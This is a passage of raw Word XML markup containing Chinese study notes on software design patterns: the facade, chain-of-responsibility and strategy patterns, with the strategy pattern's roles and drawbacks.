          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>被监听者</w:t>
      </w:r>
      <w:r w:rsidR="007305E0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF05D8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>和事件</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF05D8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，执行逻辑时通知</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF05D8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>observer</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF05D8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>即可触发</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF05D8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>oberver</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF05D8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF05D8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>update,</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF05D8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>同时可传被观察者和参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F16AB" w:rsidRPr="006C4E9C" w:rsidRDefault="004F16AB" w:rsidP="006C4E9C">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">7 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>门面模式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B138B6" w:rsidRDefault="003D1886" w:rsidP="00B138B6">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:after="180"/>
        <w:ind w:firstLine="238"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Façade</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>门面</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>模式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00B138B6" w:rsidRPr="00B138B6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B138B6" w:rsidRPr="00B138B6" w:rsidRDefault="00B138B6" w:rsidP="00B138B6">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:after="180"/>
        <w:ind w:firstLine="238"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>(1)</w:t>
      </w:r>
      <w:r w:rsidRPr="00B138B6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>松散耦合：门面模式松散了客户端与子系统的耦合关系，让子系统内部的模块能更容易扩展和维护。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B138B6" w:rsidRPr="00B138B6" w:rsidRDefault="00B138B6" w:rsidP="00B138B6">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:after="180"/>
        <w:ind w:firstLine="238"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>(2)</w:t>
      </w:r>
      <w:r w:rsidRPr="00B138B6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>简单易用：门面模式让子系统更加易用，客户端不再需要了解子系统内部的实现，也不需要跟众多子系统内部的模块进行交互，只需要跟门面类交互就可以了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D1886" w:rsidRDefault="00B138B6" w:rsidP="00B138B6">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0"/>
        <w:ind w:firstLine="238"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>(3)</w:t>
      </w:r>
      <w:r w:rsidRPr="00B138B6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>更好的划分访问层次：通过合理使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00B138B6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Facade</w:t>
      </w:r>
      <w:r w:rsidRPr="00B138B6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，可以帮助我们更好地划分访问的层次。有些方法是对系统外的，有些方法是系统内部使用的。把需要暴露给外部的功能集中到门面中，这样既方便客户端使用，也很好地隐藏了内部的细节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0082274B" w:rsidRPr="006C4E9C" w:rsidRDefault="0082274B" w:rsidP="0082274B">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">8 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>责任链模式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0082274B" w:rsidRDefault="001F2889" w:rsidP="0082274B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:after="180"/>
        <w:ind w:firstLine="238"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>每个对象都有就处理请求，从而避免请求的发</w:t>
      </w:r>
      <w:r w:rsidRPr="003E322F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>送者和接受者之间的耦合关系</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。将这些对象连成一条链，并沿着这条链传递请求，直到有一个对象处理它位置。</w:t>
      </w:r>
      <w:r w:rsidR="003E322F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E322F" w:rsidRDefault="003E322F" w:rsidP="0082274B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:after="180"/>
        <w:ind w:firstLine="238"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>在处理用户的请求时可能要根据不同的情况对请求添加不同的处理逻辑，在这时候就可以利用责任链进行设计。当需要添加一个处理逻辑时可以很方便的添加一个处理的节点。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D1326" w:rsidRPr="006C4E9C" w:rsidRDefault="00CD7C05" w:rsidP="000D1326">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidR="000D1326">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000D1326">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>策略模式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0082274B" w:rsidRDefault="00C723E0" w:rsidP="00C723E0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C723E0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>策略模式是对算法的包装，是把使用算法的责任和算法本身分割开来，委派给不同的对象管理。策略模式通常把一个系列的算法包装到一系列的策略类里面，作为一</w:t>
      </w:r>
      <w:r w:rsidRPr="00C723E0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C723E0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>个抽象策略类的子类。用一句话来说，就是：“准备一组算法，并将每一个算法封装起来，使得它们可以互换”。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C723E0" w:rsidRDefault="00C723E0" w:rsidP="00B138B6">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0"/>
        <w:ind w:firstLine="238"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="1745128"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="304" name="图片 4" descr="http://dedecms.com/uploads/allimg/120822/09550432G-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dedecms.com/uploads/allimg/120822/09550432G-0.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId67" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="1745128"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD2FFE" w:rsidRPr="00CD2FFE" w:rsidRDefault="00CD2FFE" w:rsidP="00CD2FFE">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:after="180"/>
        <w:ind w:firstLine="238"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD2FFE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>这个模式涉及到三个角色：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD2FFE" w:rsidRPr="00CD2FFE" w:rsidRDefault="00CD2FFE" w:rsidP="00CD2FFE">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:after="180"/>
        <w:ind w:firstLine="238"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CD2FFE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>环境</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD2FFE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(Context)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD2FFE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>角色：持有一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD2FFE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Strategy</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD2FFE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的引用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD2FFE" w:rsidRPr="00CD2FFE" w:rsidRDefault="00CD2FFE" w:rsidP="00CD2FFE">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:after="180"/>
        <w:ind w:firstLine="238"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CD2FFE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>抽象策略</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD2FFE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(Strategy)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD2FFE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>角色：这是一个抽象角色，通常由一个接口或抽象类实现。此角色给出所有的具体策略类所需的接口。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD2FFE" w:rsidRPr="000D1326" w:rsidRDefault="00CD2FFE" w:rsidP="00CD2FFE">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0"/>
        <w:ind w:firstLine="238"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CD2FFE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>具体策略</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD2FFE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(ConcreteStrategy)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD2FFE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>角色：包装了相关的算法或行为。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD2FFE" w:rsidRPr="00CD2FFE" w:rsidRDefault="00CD2FFE" w:rsidP="00CD2FFE">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:after="180"/>
        <w:ind w:firstLine="238"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD2FFE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>策略模式的缺点</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD2FFE" w:rsidRPr="00CD2FFE" w:rsidRDefault="00CD2FFE" w:rsidP="00CD2FFE">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:after="180"/>
        <w:ind w:firstLine="238"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD2FFE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD2FFE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD2FFE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）客户端必须知道所有的策略类，并自行决定使用哪一个策略类。这就意味着客户端必须理解这些算法的区别，以便适时选择恰当的算法类。换言之，策略模式只适用于客户端知道算法或行为的情况。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00652739" w:rsidRDefault="00CD2FFE" w:rsidP="00CD2FFE">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0"/>
        <w:ind w:firstLine="238"/>
        <w:rPr>
